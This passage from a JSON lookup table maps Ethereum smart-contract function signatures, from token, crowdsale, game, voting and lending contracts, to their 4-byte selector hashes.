"0xcdbd7516", "closeProvider()": "0x7ed65c87", "getProviderCurrentSupply(address)": "0xf2af0e2f", "getProviderDetails(address,uint256)": "0x4e45fba9", "getProviderInfo(address,uint256)": "0x2f978ec0", "setProviderDetails(address,string,string,string,uint8,address)": "0xf9261d3f", "createProvider(bool,string,string,string,string,uint8,bool,address)": "0xd6142c5b", "checkCorrectRate(bool,uint8)": "0x9c841c16", "setRightForInterest(uint256,uint256,bool)": "0x14ae1229", "rightForInterest(uint256,bool)": "0xb8ebed78", "getUserDetails(address,uint256)": "0x92968125", "provider(address)": "0xfbaf094a", "getConfigAddress()": "0x3ec27341", "cashin()": "0xe01c6d4e", "TokenTransferContract(address,address)": "0xf89fdabc", "stub()": "0x96dbab81", "clearBalance(address)": "0x32ba65aa", "addProposal(address,uint256)": "0x9f3d7b0b", "castVote(address,uint256)": "0xff91bb45", "Triunvirate(address[])": "0xb94ee0fc", "getPlayers()": "0x8b5b9ccc", "getGames()": "0xc04c5947", "getGameName(address)": "0xd2ab78b7", "getPlayerName(address)": "0xe18d38ce", "addPlayer(address,bytes32)": "0x6d36ebf8", "addGame(bytes32,address,address,uint256)": "0x6dc3e97e", "requiredContribution()": "0xb53e9dfe", "potSize()": "0x68b6d55d", "userTotalCredit(address)": "0x5aad507b", "emergencyWithdrawal()": "0x5b0a3843", "activateEscapeHatch()": "0x88efc97b", "enableEscapeHatch()": "0x2ddea5fc", "endOfROSCARetrieveFees()": "0x1a23bee3", "endOfROSCARetrieveSurplus()": "0x0dbbc14c", "getContractNetBalance()": "0xd2b78529", "getParticipantBalance(address)": "0xe9560b3b", "sendFundsToMsgSender(uint256)": "0x9c4b653d", "validateAndReturnContribution()": "0xf417614a", "removeFees(uint256)": "0x6cf70679", "swapWinner()": "0x4da845b3", "recalculateTotalFees()": "0x79902299", "findSemiRandomWinner(uint16)": "0x588d6a17", "creditWinner()": "0x3a8d1eb1", "cleanUpPreviousRound()": "0xaae233b4", "startRound()": "0x55e3f086", "getTheTokens()": "0x01201c0b", "sendToBuyer()": "0xafdb0970", "activateKillSwitch()": "0xf24e7fd9", "setAddresses(address,address)": "0x90107afe", "setMaxCap(uint256)": "0x763265de", "_toLeconte(uint256)": "0x995a7174", "_toMill(uint256)": "0xfe972f11", "setWeiRate(uint256)": "0xc8a635b7", "addToWhitelist(address,uint256,bool)": "0x6bb82e82", "_processPurchaseInWei(address,uint256)": "0x5cc2f6d8", "canCallWithNoOne()": "0x0062c8cb", "canCallWithAssociation(address,address)": "0x9e9a783a", "canCallDefault(address)": "0x895ab68c", "changeStorage(address)": "0xc50c97d0", "setCoinAllowance(address,address,uint256)": "0xa6e9e95f", "subCoinAllowance(address,address,uint256)": "0x6668df7f", "addCoinAllowance(address,address,uint256)": "0x012bac23", "coinAllowance(address,address)": "0x7d7714fb", "subTokenBalance(address,uint256)": "0x70598a8e", "addTokenBalance(address,uint256)": "0xd50b3065", "tokenBalance(address)": "0xeedc966a", "subCoinBalance(address,uint256)": "0x2a5b204a", "addCoinBalance(address,uint256)": "0x29abdeed", "numOwnerAddress()": "0x7aa306a2", "isOwnerAddress(address)": "0xa2e1a8d8", "primaryOwner()": "0x8e10be33", "removeOwnerAddress(address)": "0xebd062de", "addOwnerAddress(address)": "0x0f0f3f24", "setTransferMinimumFee(uint8)": "0xdd253cd0", "transferMinimumFee()": "0x88bf60b7", "setTransferFeeRate(uint256)": "0xc894e1e5", "transferFeeRate()": "0x351bf518", "subTotalSupply(uint256)": "0x82838c76", "addTotalSupply(uint256)": "0xe468688e", "changeAuthority(address)": "0x116877cc", "changeAssociation(address)": "0xbf29b90a", "C50()": "0xf34839d1", "HCHToken(uint256,string,string)": "0x5ed5684c", "Fouracoin()": "0x360184e9", "Lock(bytes)": "0x9f7e1fed", "Take(bytes)": "0x81777b78", "setMinBalance(uint256)": "0xc91d956c", "DelphyToken(address[],uint256[])": "0x7b49e4c0", "setParams(uint256,uint256)": "0xc0324c77", "UTCToken(uint256,string,string,uint256)": "0x7bbc816e", "approveByLegacy(address,address,uint256)": "0xaee92d33", "transferFromByLegacy(address,address,address,uint256)": "0x8b477adb", "transferByLegacy(address,address,uint256)": "0x6e18980a", "destroyBlackFunds(address)": "0xf3bdc228", "removeBlackList(address)": "0xe4997dc5", "addBlackList(address)": "0x0ecb93c0", "getBlackListStatus(address)": "0x59bf1abe", "getMyToad()": "0xb7975d1f", "getFreeToad()": "0x466bf275", "BTC()": "0x2792949d", "ask(uint256)": "0xe47e7e66", "s2s()": "0x65d1df24", "PowerToken()": "0xbe2d8b2d", "FUXEToken()": "0xa34d942b", "commonConfigure(address,address)": "0x9b9111ee", "setMainsale(address)": "0x6e8add02", "setMarketingTokensWallet(address)": "0x8e93c883", "setMarketingTokensPercent(uint256)": "0x951ea5f1", "getValueBonus(uint256)": "0xcd7e3184", "getValueBonusTokens(uint256,uint256)": "0x54717ea9", "addValueBonus(uint256,uint256)": "0xb8a4db81", "paySubscription(address)": "0x0ab66be3", "isValidService(bytes32)": "0x14111a43", "setFlatFee(uint256)": "0x23fa495a", "setPaymentInterval(uint256)": "0xd157f645", "tokenReceived(address,uint256)": "0xcae15051", "setBurningPercentage(uint256)": "0x52199094", "usageFee(bytes32,uint256)": "0x2b708fc9", "payFee(bytes32,uint256,address)": "0xd30b5386", "createRefund()": "0x3b8b4a61", "unlockFor(address)": "0xdde49979", "addShare(address,uint256,uint256)": "0xae7d0cac", "unblockTokens(address,address,uint256)": "0x47b27b8b", "blockTokens(address,uint256)": "0x3c1a88d7", "allowBlocking(address,address)": "0xb58e5216", "grantToAllowBlocking(address,bool)": "0xba8ad39e", "transferAndFreeze(address,uint256,uint256)": "0x852e9f46", "freezeTokens(address,uint256,uint256)": "0xf831ebab", "defrostDate(address)": "0x50bb117a", "freezedTokenOf(address)": "0x11cfb19d", "migrateInternal(address)": "0x12571a33", "grantToSetUnpausedWallet(address,bool)": "0x20ceb536", "setUnpausedWallet(address,bool)": "0xb3e1f523", "del(address)": "0xb9caebf4", "close(address,address,uint256)": "0xf5bf7413", "RefundVault()": "0x5c770267", "lokedMint(address,uint256,uint256)": "0x76ee2d68", "paymentsInOtherCurrency(uint256,uint256)": "0x333dbda8", "distructVault()": "0x99554fb7", "prolong(uint256)": "0x1a63aa4d", "massBurnTokens(address[],uint256[])": "0x0580d5c7", "resetAllWallets()": "0x549df19f", "migrateAll(address[])": "0x680b3bdf", "moveTokens(address)": "0x63689b4a", "setCrowdsalePause(bool)": "0xe9bec833", "tokenPause()": "0x0abd2ba8", "tokenUnpause()": "0x1b302a16", "getProfitPercentForData(uint256)": "0x91816981", "getProfitPercent()": "0x566fc6de", "weiTotalRaised()": "0x2cde15d1", "getModuleIDByHash(bytes32)": "0x5bef1208", "getModuleAddressByName(string)": "0x3cab648a", "load(address,bool,address,address,address,address,address)": "0x1b2d93a0", "moduleHandler(address[])": "0xb1d06c46", "newSchellingRoundEvent(uint256,uint256)": "0x609ab538", "transferEvent(address,address,uint256)": "0x5d439cf3", "replaceModuleHandler(address)": "0xe5bc7be0", "disableModule(bool)": "0x735e9cbb", "disconnectModule()": "0x5b482ec1", "getFactory()": "0x88cc58e4", "auth(uint8,bytes32,bytes32)": "0x7adff2cb", "change(uint8,bytes32,bytes32,bytes20)": "0xa23e21f7", "verify(uint8,bytes32,bytes32)": "0xe2454522", "getChallenge()": "0x759014f0", "getSalt()": "0x13a9589c", "PasswordChallenge(bytes20,bytes32)": "0xbf22f63d", "BonusCrowdsaleMock()": "0x5ccf9f43", "levelThreeBonus(uint256)": "0x3fc4caa1", "levelTwoBonus(uint256)": "0xe8974832", "levelOneBonus(uint256)": "0xa2b475f3", "addBonuses(uint256)": "0x47e17349", "updateRewardLedger(address,uint256,uint256)": "0x2a3dc703", "updatePrice(uint256)": "0x8d6cc56d", "isPreICOClosed()": "0x6ca596fa", "RaisedFunds()": "0xe59cef17", "remaingNTRY()": "0x13a5d9e4", "minimumFundingGoal()": "0x13f4e977", "NTRYPerEther()": "0xe8bd5cc4", "NTRYAvailableForSale()": "0x8a2e196c", "preICOBeneficiaryAddress()": "0x85f63a4a", "PreICO(address,address,address,address,address)": "0xc8248f8d", "takeBackNTRY(address,address,uint256)": "0x0799ad8d", "test_invalidTokenFreeze()": "0x438c9509", "test_tokenFreeze()": "0xc8a6dab7", "setup()": "0xba0bba40", "freezeAllowance(address,uint256)": "0xd107a5cc", "createHumanStandardToken(address,uint256,string,uint8,string)": "0xa5aa0545", "changeCanUpgrade(bool)": "0x4d7c0192", "MockFailUpgradeableToken()": "0x4eb421e5", "b(address)": "0xbda02782", "TokenStorage(uint256,address)": "0xf6a01234", "getInterMixed()": "0x3b632a74", "getBytes()": "0x0bcd3b33", "getBools()": "0x1ebeb80b", "getInts()": "0xc6ee701e", "computeMerkleRoot(bytes,bytes)": "0x378c4c1c", "signatureSplit(bytes)": "0xefcd1cd9", "decodeLock(bytes)": "0x9f9ea29d", "recoverAddressFromSignature(uint64,uint256,bytes32,bytes32,bytes)": "0x90e761cd", "setUser(string,string,string,bytes32)": "0x851aea7a", "UserAuthManager(address)": "0x30c2fb04", "newMultiService(address[])": "0x5c612167", "MultiServiceFactory(address)": "0x8c0989ab", "isService(address)": "0xe9d8dbfd", "ownerOf(address)": "0x14afd79e", "addService(address)": "0x5372a9ce", "MultiService(address,address[])": "0xa6fd96b0", "amountContributed(address)": "0x36aec5a3", "CampaignAccount(address,uint256)": "0x84b06191", "hasFailed(address,uint256)": "0x7e07877a", "hasWon(address,uint256)": "0x5b766196", "votingWeightOf(address,uint256,uint256,uint256)": "0x2ae1158d", "canExecute(address,uint256)": "0x4b0f43fd", "canPropose(address,uint256)": "0x0ce71356", "GxOwned(address)": "0x7bc775db", "TopSciFiVoter()": "0x9bfc80fc", "partyHash(address,address,address,address)": "0x67be0854", "vote(bytes32,uint256)": "0x9ef1204c", "ERC20Voting(address)": "0xa8bbe5a4", "Crowdsale(uint256,uint256,uint256,address)": "0xabaf5880", "refill(address,uint256)": "0x0aa3ae7e", "spend(address,uint256)": "0xaf7d6ca3", "hasEnough(address,uint256)": "0x365c2e95", "getDepositRecord(address)": "0x3dc58149", "getDeposit(address)": "0xe1254fba", "getDepositOwner(address)": "0x9ffc981f", "register(address,uint256,address)": "0x95bda19d", "Factory(address,address)": "0xc7d5dd36", "fxpDiv(uint256,uint256,uint256)": "0x0b1dfa26", "fxpMul(uint256,uint256,uint256)": "0xd39f4149", "isMultipleOf(uint256,uint256)": "0xe45a4fb4", "getUint256Max(int256)": "0xae2022c0", "getUint256Min(int256)": "0xf6fe3a01", "setWriterId(address,bytes32,bytes32)": "0xcb8820ef", "setReaderId(address,bytes32,bytes32)": "0x146d2148", "setHash(address,bytes32,address,bytes32,uint256)": "0xa269202f", "setAllowCnsContract(address,bytes32,address,bytes32,bool)": "0xd693dca2", "create(address,bytes32)": "0xa3def923", "updateUSDMonthlySalaries(address,uint256,uint256)": "0xe2b770b4", "setTokensAllocation(address,uint256,address[],uint256[])": "0xdc622bcc", "setAllowedTokens(address,uint256,address[])": "0x3a1e08e0", "nextId(address)": "0x46190ec4", "setEmployeeTokenAllocation(address,address,address[],uint256[])": "0xe83c0bba", "removeEmployee(address,uint256)": "0x044aed7c", "setEmployeeSalary(address,uint256,uint256)": "0xa861e16f", "addEmployee(address,address,address[],uint256)": "0x07e0e6f1", "getEmployee(address,uint256)": "0x0ea7a110", "getEmployeeId(address,address)": "0x83627b8e", "getEmployeeCount(address)": "0x1123fcce", "isEmployee(address,address)": "0xc2cd7632", "payForYourGladiator(uint256)": "0x0e816f66", "payWinningGladiator(uint256,uint256)": "0xe30b407e", "payOff()": "0x3fac68d5", "createMatch(string,string,uint256,string)": "0x9574f4e1", "BlockchainBattleground()": "0x27a936d7", "SmartshareStandardToken(uint256,string,uint8,string)": "0x6d21f638", "SimpleSafeToken(uint256,uint8,string,string)": "0x71efb7f7", "changeFundWallet(address)": "0x6fb4adff", "buyTo(address)": "0xdcf72c10", "burnMyTokens(uint256)": "0x6764765d", "allocateTokens(address,uint256,address)": "0xb61241ed", "setTokens(address,uint256)": "0xbac79651", "getCurrentPhaseIndex()": "0xa7fbed9e", "addPhase(uint256,uint256,uint256)": "0x66a9234c", "validatePhaseDates(uint256,uint256)": "0x768c326d", "createProductionUnit3Beta()": "0xe9353cb7", "createProductionUnit2Beta()": "0xa38c48b6", "createProductionUnit1Beta()": "0x21594110", "manualTokenTransfer(address,uint256)": "0x7c359dc3", "isWithinContributionRange()": "0xc8051885", "BetterAuction()": "0xffb31c62", "duelAnotherCovfefe(uint256,uint256)": "0xa560a956", "_createCovfefe(string,string,uint16,address,uint256)": "0x6bb80acc", "getTokensOfOwner(address)": "0x5de6dc55", "addValueToCovfefe(uint256)": "0x743f978f", "setCovmanager(address)": "0x336b739a", "setCovman(address)": "0x0dfce266", "lastPriceOf(uint256)": "0x2e21b085", "buyCovfefe(uint256)": "0x3eaa8128", "addMeaningToCovfefe(uint256,string)": "0x2efbb80c", "getCovfefe(uint256)": "0x6defd595", "createContractCovfefe(string,string,uint16)": "0x408d5773", "createPromoCovfefe(address,string,string,uint16,uint256)": "0x4035d16a", "CryptoCovfefes()": "0x40ee2485", "EnergisToken()": "0x4913ec88", "batchTransferToken(address,address,uint8,bytes32[])": "0x3a373db7", "registerMintedToken(address,string)": "0x0b9b8130", "submitRing(address[4][],address,uint256[6][],uint256,uint8[1][],uint8,bool[],uint8[],bytes32[],bytes32[],address,uint16)": "0x383e4b27", "cancelOrder(address[5],uint256[6],bool,uint8,uint8,bytes32,bytes32)": "0x8c59f7ca", "CryptoCoin()": "0x9af2cad2", "cancelTrade(uint256)": "0x09ec6cc7", "tradeCards(address,uint256)": "0x346cf356", "addToTradeList(uint256[],uint256[],uint256[],uint256[])": "0x06c45c2a", "cancelSell(uint256,uint256,uint256,uint256)": "0xcace467e", "buyCard(address,uint256,uint256,uint256)": "0x864aef45", "addToSellList(uint256,uint256,uint256)": "0x39d4e21a", "cancelBuy(uint256,uint256,uint256,uint256)": "0x29d6ec95", "sellCard(address,uint256,uint256,uint256,uint256)": "0xe56e56b2", "addToBuyList(uint256,uint256)": "0xbd76bf19", "getTrade(uint256,address,address)": "0x374b8cda", "getSell(uint256,address,address)": "0x302bda24", "getBuy(uint256,address,address)": "0x58317685", "withdrawEthBalanceSave()": "0x4b97e6cc", "getLockedEth()": "0x3bc867f5", "setSecureFees(bool)": "0xa528fec4", "getSecureFees()": "0x6c4b3197", "setTradingFee(uint256)": "0xb0d54bcf", "setCut(uint256)": "0x727cdf87", "setCopaCoreAddress(address)": "0x542cad3d", "getCopaCoreAddress()": "0xf8542f5e", "dice(uint256)": "0xf88d6732", "maxDice()": "0xa8e8f677", "getPack(uint256)": "0x895ec54c", "transferFrom(address,address,uint256,uint256)": "0xfe99049a", "transferMultiple(address,uint256[],uint256[])": "0x99583417", "transfer(address,uint256,uint256)": "0x095bcdb6", "getPackBuy(address,address,uint256)": "0x81af8949", "balancesOf(address)": "0x6392a51f", "balanceOf(address,uint256)": "0x00fdd58e", "withdrawEthBalance()": "0xe8ddf15a", "setTotalCardCount(uint256)": "0x8f8949e6", "setPackSize(uint256)": "0x0d1a0c62", "setCopaMarketAddress(address)": "0x87627869", "getCopaMarketAddress()": "0x13ceb89b", "buyBlueStarEgg(uint256,uint16)": "0xe2f8b790", "setAddress(address,address,address,address)": "0x9608088c", "DragonTreasureToken(address,address,address)": "0xa706d26e", "buyBlueStarEgg(address,uint256,uint16)": "0x5be1d5c3", "unsellpause()": "0x2cd6305f", "sellpause()": "0xf1fa1744", "allocateTokens(address[],uint256[])": "0xa7368afb", "approveProxy(address,address,uint256,uint8,bytes32,bytes32)": "0x7f5dfd16", "removeLock(address)": "0x4a387bef", "setExclude(address)": "0x5f6f8b5f", "addLock(address)": "0x882f327b", "disableLock(bool)": "0x91c71e2b", "enableTransfer(bool)": "0xef7ac0e5", "__callback(uint256)": "0x38be706d", "setUpdaterAddress(address)": "0x91afc432", "Mari()": "0x756afcab", "burnTokens(address,address,address,uint256)": "0x5646435b", "sendCrowdsaleTokens(address,address,uint256)": "0x9bce51e3", "BineuroToken()": "0x4f851d73", "MAMECOIN()": "0xa37218ed", "transferFAIDS(address[],uint256[])": "0x071696e0", "FAID(uint256,string,uint8,string)": "0x0ebf0bcb", "investment()": "0x45fbfbca", "getCurrentExchangeRate(uint256)": "0x2036e2f7", "WinancesToken()": "0xd2559533", "setMAXfinney(uint256)": "0x8fdfac6b", "createGroup()": "0x575185ed", "createGroup(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xec2f81ac", "setAllowedToPurchase(bool)": "0xed9ca4ff", "setAllowedToSell(bool)": "0x6fef4fa9", "fundContract()": "0xbd097e21", "setMaximumGasPrice(uint256)": "0x79c8fe30", "LTE()": "0x9b129181", "OACC()": "0xf0cd8057", "_transferCar(address,uint256,bool)": "0x649eea7f", "addCar(uint256)": "0x4cf2010e", "addMake(uint256)": "0xa8cbb5de", "addCompany()": "0xea7873db", "WBToken()": "0x63ddbb99", "DatoDEX(address,address,address,uint256,uint256,uint256)": "0x7ee81902", "MannaCoin()": "0xdbac248b", "_doTradeWithEth(address,uint256,address)": "0xc4b2841c", "_doTradeForEth(address,uint256,address)": "0x97d351b3", "_doTrade(address,address,uint256,uint256)": "0x71f7ebf4", "_getExpectedRate(address,address,uint256)": "0xf404df8e", "setEMAPeriods(uint256)": "0xcc677679", "setBZRxTokenContractAddress(address)": "0x41ce9f0e", "setWethContractAddress(address)": "0xf1cf5b38", "setKyberContractAddress(address)": "0xd28a4f9e", "setVaultContractAddress(address)": "0x871105cc", "setManualTradingAllowed(bool)": "0xc4cae886", "setMarginThresholds(uint256,uint256)": "0x8605c97e", "setBountyRewardPercent(uint256)": "0xb5c9fa0a", "setGasRewardPercent(uint256)": "0x8ce4f1b2", "setLiquidationThresholdPercent(uint256)": "0x16317e7e", "setInterestFeePercent(uint256)": "0x8c9f7074", "getExpectedRate(address,address,uint256)": "0x809a9e55", "isTradeSupported(address,address,uint256)": "0x5a1e921b", "getCurrentMarginAmount(address,address,address,uint256,uint256,uint256)": "0x00432cf3", "getProfitOrLoss(address,address,uint256,uint256)": "0x5376a03d", "getTradeRate(address,address)": "0x757d9b97", "shouldLiquidate(bytes32,address,address,address,address,uint256,uint256,uint256,uint256)": "0xbe3daf55", "doTradeofCollateral(address,address,uint256,uint256,uint256,uint256)": "0x2b2c71af", "verifyAndLiquidate(address,address,address,uint256,uint256,uint256,uint256)": "0xac88c8d8", "doTrade(address,address,uint256)": "0xcb33e7fa", "doManualTrade(address,address,uint256)": "0x7c06db04", "didCloseLoan(bytes32,address,bool,uint256)": "0x4773e0be", "didWithdrawProfit(bytes32,address,uint256,uint256)": "0x1988f6fd", "didChangeCollateral(bytes32,address,uint256)": "0xc10d0f11", "didWithdrawCollateral(bytes32,address,uint256)": "0xf956fc52", "didDepositCollateral(bytes32,address,uint256)": "0x77952161", "didPayInterest(bytes32,address,address,address,uint256,bool,uint256)": "0x850db35d", "didTradePosition(bytes32,address,address,uint256,uint256)": "0x32f76c11", "didTakeOrder(bytes32,address,uint256)": "0x365ccbef", "eip20Approve(address,address,uint256)": "0x11bed352", "eip20TransferFrom(address,address,address,uint256)": "0xba35f38d", "eip20Transfer(address,address,uint256)": "0x6898730f", "updateEMA(uint256)": "0x36127d7e", "sendRefund(address,uint256,uint256,uint256)": "0x16eff85d", "calculateAndSendRefund(address,uint256,uint256,uint256)": "0x99e1cc47", "transferBZxOwnership(address)": "0x72e98a79", "changeSolidStampContract(address)": "0x545a5896", "registerAuditOutcome(address,bytes32,bool)": "0xadcf4831", "getAuditOutcome(address,bytes32)": "0x1f74de51", "getOracleList()": "0x510c27ad", "getOracleAddresses()": "0x7330aba2", "getOracleByName(string)": "0x7216e02d", "getOracleMetaData(address)": "0x6248d6bf", "getOracleAddressByName(string)": "0xed36a874", "hasOracle(address)": "0x180c9309", "setOracleName(address,string)": "0xfac3c1f4", "removeOracle(address,uint256)": "0xe8d1891b", "addOracle(address,string)": "0x071a56df", "Bitescia()": "0x6c303e1b", "_cancelSellOfferInternal(uint32,bool)": "0xe3e9800d", "_calculatePercent(uint256,uint256)": "0xfb1c3461", "_getFeeHistory(uint32)": "0x1d4d8808", "_onCanvasCreated(uint256)": "0x4c32a444", "_registerTrade(uint32,uint256)": "0xc7995a4e", "_registerBid(uint32,uint256)": "0x05e206f0", "splitTrade(uint256)": "0xac4501d9", "splitBid(uint256)": "0x304f34a0", "getRewardsWithdrawn(uint32,address,address)": "0x0d043a60", "getTotalRewards(uint32)": "0x0ab85a10", "getCommissionWithdrawn(uint32)": "0x1359cb2c", "getTotalCommission(uint32)": "0x4484d92b", "calculateRewardToWithdraw(uint32,address,address)": "0x5d44b508", "calculateCommissionToWithdraw(uint32)": "0xbd646356", "setCanvasName(uint32,string)": "0xfab825c6", "_createCanvasInternal(address)": "0xe9bc13b8", "setPixels(uint32,uint32[],uint8[])": "0x88c9a7d5", "bookCanvasFor(uint32,address)": "0xb3f08078", "createAndBookCanvas(address)": "0x6d94dce1", "PingPaid()": "0xeefa5dfc", "coinbase()": "0xa6ae0aac", "AbccCoinToken()": "0x77cb6b7f", "coinbaseAmount()": "0xadd08f87", "Coinbase(uint256)": "0xfed3b141", "SmartAdvancedCoin(uint256,string,string)": "0x9bb8ec22", "reclaimExpiredSwap(bytes32,bytes32)": "0x77699a06", "batchConvertIntoHtlc(bytes32[],address[],uint256[],uint256[],uint256[],bytes32[])": "0x89b898b8", "earlyResolve(bytes32,uint256,bytes)": "0x59391a67", "jdaleveridgesyscoin()": "0x9f4283fa", "clearProcessedBet(uint256)": "0x3e5efd92", "clearStorage(uint256[])": "0xef115542", "refundBet(uint256)": "0xe1fdb4b4", "infinity()": "0xbefe0e79", "fieldOrder()": "0x54b8c024", "genOrder()": "0xb0119a22", "BLOOToken()": "0xab074225", "GenesisGlobalTestToken()": "0x44e5d154", "Payperblock()": "0xe2311a78", "unlike(uint256)": "0x74d21ae0", "addressToBlock(address,bool)": "0x964c7d84", "addressToPass(address,bool)": "0xa18717a9", "isInBlockFilter(address)": "0xafbdaa05", "isInPassFilter(address)": "0x483b1a76", "markFirstSaleComplete()": "0xe3470882", "addSpecialAccount(address)": "0xe9db5f5a", "BLKToken(address)": "0x68f7ef1b", "cancelOrder(address,uint256,address,uint256,uint256,uint256,uint8,bytes32,bytes32,address)": "0x21f9caef", "withdrawCryptoCurrencyNetworkTokens(address)": "0xa6cc0428", "CCN()": "0xfe7ccb79", "WTechTestCoin()": "0x34e255a4", "pauseStatus()": "0x466916ca", "tap()": "0xfd221031", "fuckingClaim1(bytes,bytes)": "0xfb67983c", "fuckingClaim2(bytes,bytes)": "0x1c61f2bc", "fuckingkill()": "0x3b6b9a5e", "tgrNextPartContributor()": "0x6d9dcdb9", "tgrCurrentPartContributor()": "0x90d58a70", "tgrLive()": "0x6b8da9a2", "getVotesBetweenFor(uint256,uint256,uint256,address)": "0x4b1be424", "getVotesBetween(uint256,uint256,uint256)": "0x176416ed", "_getVotes(uint256,uint256,uint256,address)": "0x9cf4cb1e", "HappyBirthday(address,uint256)": "0x7ff86a35", "Take()": "0xac110d8e", "collectRemaining()": "0x57afb890", "DelayedPayment(address,uint256,address,uint256)": "0x2e2d6ab1", "nAddressLog()": "0xeb12fef5", "_ballotIdToNamespace(uint256)": "0xc92728a1", "setAdminLevel(address,uint8)": "0x4bd21127", "dumpdivs()": "0x0dda350f", "_finishBet(bool,address)": "0xb613df16", "finishBet()": "0x8701a2f0", "maxRandom(uint256,address)": "0x61990759", "setAdURI(uint256,string)": "0xcf7018d4", "addAd(uint32,uint32,string,string,string,uint256)": "0x8c8fc30b", "TJCUToken(uint256,string,uint8,string)": "0xe15746af", "cram(address,uint256,string)": "0x357a05cd", "NukeContract(address)": "0x0a63ae38", "CRYPTONEREUM()": "0xa84e5f40", "triggerStealManually3(string,uint256)": "0x2857bc60", "supplyTokens(uint256)": "0xfd5eddf3", "setComplete(bool)": "0xbeaa4765", "maxSupplyReached()": "0x71ff01b0", "createFreeToken(string,address)": "0x3bfa4449", "createReleaseTokenAuction(string,uint256,uint256,uint256)": "0x5a9d27dc", "isCurioAuction()": "0x40ec0b6a", "Kanzhang()": "0x60048290", "dhopakcoin()": "0x3f76fbd3", "Studio()": "0x29f799cb", "GoBlock()": "0x6b944bd6", "getMap()": "0xad3de14c", "getPropertyInfo(uint8)": "0x9cae9e03", "distributeFee(uint256)": "0x05cc49dd", "noFee(address,address,uint256)": "0xde68c43f", "setDataFactory(address)": "0x045d465f", "addProperty(string,string,uint64,uint64,uint64)": "0xf5597e21", "hasPrestige(address)": "0x091356c5", "getFirstBuyersFee()": "0x27d272c5", "getCPFee()": "0x37ab9dcf", "getBlocksquareFee()": "0x9a4ed149", "getNetworkFee()": "0xfc043830", "canMakeNoFeeTransfer(address,address)": "0xcb82d5df", "getTotalWeightedContribution()": "0xe9e041f3", "getNumberOfTransactions()": "0x24ba506d", "getFirstBuyerAddress(uint256)": "0xeb90450f", "getNumberOfFirstBuyer()": "0x07fee501", "getFirstBuyer(address)": "0xc11737c7", "incomingTransaction(uint256)": "0x5fceab11", "addFirstBuyers(address[],uint256[])": "0x281fe829", "noFeeTransfer(address,uint256)": "0x91ebc861", "checkPersonalRemaining(address)": "0xc9ddd118", "checkContributedETH(address)": "0x5d1edfa0", "checkTotalSold()": "0x56e789eb", "checkBonus(address)": "0x113b5cf2", "start(uint32)": "0xb63e0cd8", "addEarlylist(address[],address)": "0xa91be87f", "addWhitelist(address[],address)": "0x9246ab77", "HBVToken()": "0x60281080", "Parabola()": "0x35956083", "RecreationCultureMassMediaCoin()": "0x0cfd2c6a", "TornadoChain()": "0x4cedfc02", "cancelCreatorAuction(uint40)": "0x30d9161d", "getCutieId(bytes)": "0xd85ba798", "DAMIToken(address)": "0x7a78cccc", "DIETCoin()": "0xcffa4346", "YouLongToken()": "0x2d1608db", "transferableTokensNow(address)": "0xcfefe48b", "WemarkToken()": "0xc730dfbb", "CrowdsaleToken(string,string,uint256,uint8)": "0x278c284c", "DDNToken(uint256,string,uint8,string)": "0x56e19e6e", "S1Coin()": "0x4b54f1fb", "getSiteTokenIds(uint256)": "0x13f94a43", "getSiteTokenLength(uint256)": "0x31ac76c7", "setVicepresidenteDeMesa(bytes32,uint256,uint256,uint256)": "0xfdda3d8a", "setPresidenteDeMesa(bytes32,uint256,uint256,uint256)": "0xd1818aed", "setPresidenteDeMesaVerify(bytes32,uint256,uint256,uint256)": "0x45da75d3", "setApoderado(bytes32)": "0x74590f64", "setApoderadoVerify(bytes32)": "0x87ed5112", "setDelegadoDeEscuela(bytes32,uint256,uint256)": "0xd812f2b0", "setDelegadoDeEscuelaVerify(bytes32,uint256,uint256)": "0x498cb7cb", "setAutoridadElectoral(bytes32)": "0x468e4509", "getUserByEmail(bytes32)": "0x85bfe55d", "getUserByEmailVerify(bytes32)": "0x8e735547", "createAutoridadElectoral(bytes32,bytes32)": "0xba1d8d4f", "existsUserByEmail(bytes32)": "0x58d40f7e", "deleteUserByEmail(bytes32)": "0x1de98d93", "createUserByEmail(bytes32,bytes32,uint256)": "0xd189c1b0", "createUserByEmailVerify(bytes32,bytes32,uint256)": "0x146155bf", "signup(bytes32,bytes32)": "0xf8538662", "signupVerify(bytes32,bytes32)": "0xf396282d", "inPermissions(address)": "0x170bdb36", "lengthOfPermissions()": "0x8401e614", "queryPermissions()": "0x46f02832", "queryRole()": "0x71d6e229", "deletePermissions(address[])": "0xae5942cd", "addPermissions(address[])": "0x0bc1734c", "deleteRole()": "0x126004b8", "Role(bytes32,address[])": "0x9080345d", "setCounter(int256)": "0x93d9df16", "listUnconferences()": "0xd2ca159a", "findUnConference(string)": "0x65fb99ba", "x(uint256,address)": "0x8cd4d21a", "Sample()": "0xeb5ce181", "invalidateAnnouncement(uint256)": "0xe2466cb6", "oppositeAnnouncement(uint256)": "0xc06d1490", "closeAnnouncement(uint256)": "0x4f7474cb", "checkOpposited(uint256,bool)": "0x5936387c", "Announcements(uint256)": "0xd18e142d", "publisher(address)": "0xddc541dd", "getInvestorsCount()": "0xed21187a", "invested(address)": "0x66b3f6bf", "FundsRegistry(address[],uint256,address)": "0x459469e0", "cleanConsents(bytes32[],address[])": "0x94313f9f", "cleanActions(bytes32[])": "0x95dea05b", "changeParticipants(address[])": "0x3f807199", "consent(bytes32[])": "0xb64ff429", "eval(bytes32[])": "0x992bb01e", "addAction(address,bytes4,bytes32[])": "0x97acb3bb", "UnanimousConsent(address[])": "0xb25e6181", "CreateANM(address,uint256)": "0x16431c5b", "AnemoiSaleContract()": "0x368f3492", "testDeleteItem()": "0x70502c5a", "testThrowInvalidProvider()": "0x932f9f89", "testSetValidProvider()": "0xbdbcd001", "testMetered()": "0xd16782f6", "testThrowIfNotExist()": "0x3557d0e9", "stockSize()": "0x6960947d", "StockLocation(string)": "0x2ac69167", "toggleFreeze()": "0x34fc2591", "unlockEscrow()": "0xd7982a6c", "changeCap(uint256)": "0x800edb9d", "changeBlocks(uint256,uint256)": "0xabbf7228", "Sales(address,uint256,string,uint8,string,uint256,uint256,uint256,uint256,uint256)": "0x0daf37e6", "destroyContract()": "0x092a5cce", "findPlayer(address)": "0xa817f668", "playGame(uint256)": "0x5873533d", "joinGame(string)": "0x3d536a2e", "NameGame(uint256,uint256,uint256)": "0x7c265200", "Origin()": "0xc11a4b47", "releaseApproval(address)": "0x8c374d8d", "Tmc4(uint256,string,uint8,string)": "0x97799d47", "transferCopyFrom(address)": "0x7444b006", "fee(address,uint256)": "0x9e6eda18", "MyToken(uint256,string,string,uint8)": "0xb50a89f3", 